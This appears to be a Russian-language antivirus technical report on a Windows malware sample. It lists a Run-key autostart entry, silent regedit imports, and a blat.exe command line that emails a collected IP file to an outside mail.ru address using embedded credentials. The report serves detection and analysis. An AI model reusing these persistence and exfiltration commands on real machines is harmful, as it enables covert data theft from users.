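Техническая информация
Автозапуск — параметр '111' в ветке Run текущего пользователя запускает %WINDIR%\bat.exe при каждом входе в систему:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '111' = '%WINDIR%\bat.exe'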
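Запускаемые командные строки. Судя по параметрам, blat.exe (консольная утилита отправки почты по SMTP) настраивается на сервер smtp.mail.ru:587 с учётными данными, указанными прямо в командной строке, и отправляет файл 04/22/2014_Know_IP.txt; запуск blat.exe из %TEMP% и исходящее SMTP-соединение с рабочей станции — признаки, пригодные для обнаружения:
- '%TEMP%\1.tmp\blat.exe' 04/22/2014_Know_IP.txt -to protected_by@mail.ru
- '%TEMP%\1.tmp\blat.exe' -install -server smtp.mail.ru -port 587 -f ip_for_tests@mail.ru -u ip_for_tests@mail.ru -pw 852456protected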
- '%WINDIR%\regedit.exe' /s %WINDIR%\features.reg
- '%WINDIR%\regedit.exe' /s %WINDIR%\Product.reg
- '%WINDIR%\regedit.exe' /s %WINDIR%\ff.reg
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\bat.cmd" "
- '<SYSTEM32>\ping.exe' localhost -n 5
Файлы (подзаголовок на странице утрачен; предположительно — создаваемые файлы):
- %WINDIR%\bat.exe
- %TEMP%\1.tmp\bat.exe
- %TEMP%\1.tmp\realip.exe
- %WINDIR%\Product.reg
- %WINDIR%\features.reg
- %WINDIR%\ff.reg
- %TEMP%\1.tmp\Product.reg
- %TEMP%\1.tmp\blat.exe
- %TEMP%\1.tmp\blat.dll
- %TEMP%\1.tmp\bat.cmd
- %TEMP%\1.tmp\ff.reg
- %TEMP%\1.tmp\features.reg
- %TEMP%\1.tmp\blat.lib
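Файлы (подзаголовок на странице утрачен; предположительно — удаляемые файлы, все пути относятся к временному каталогу %TEMP%\1.tmp):
- %TEMP%\1.tmp\realip.exe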
- %TEMP%\1.tmp\Product.reg
- %TEMP%\1.tmp\bat.cmd
- %TEMP%\1.tmp\bat.exe
- %TEMP%\1.tmp\ff.reg
- %TEMP%\1.tmp\blat.exe
- %TEMP%\1.tmp\blat.dll
- %TEMP%\1.tmp\features.reg
- %TEMP%\1.tmp\blat.lib
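Окна (подзаголовок на странице утрачен; судя по формату записей — окна, которые ищет программа, по имени класса и заголовку):
- ClassName: 'Indicator' WindowName: '(null)'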
- ClassName: 'RegEdit_RegEdit' WindowName: '(null)'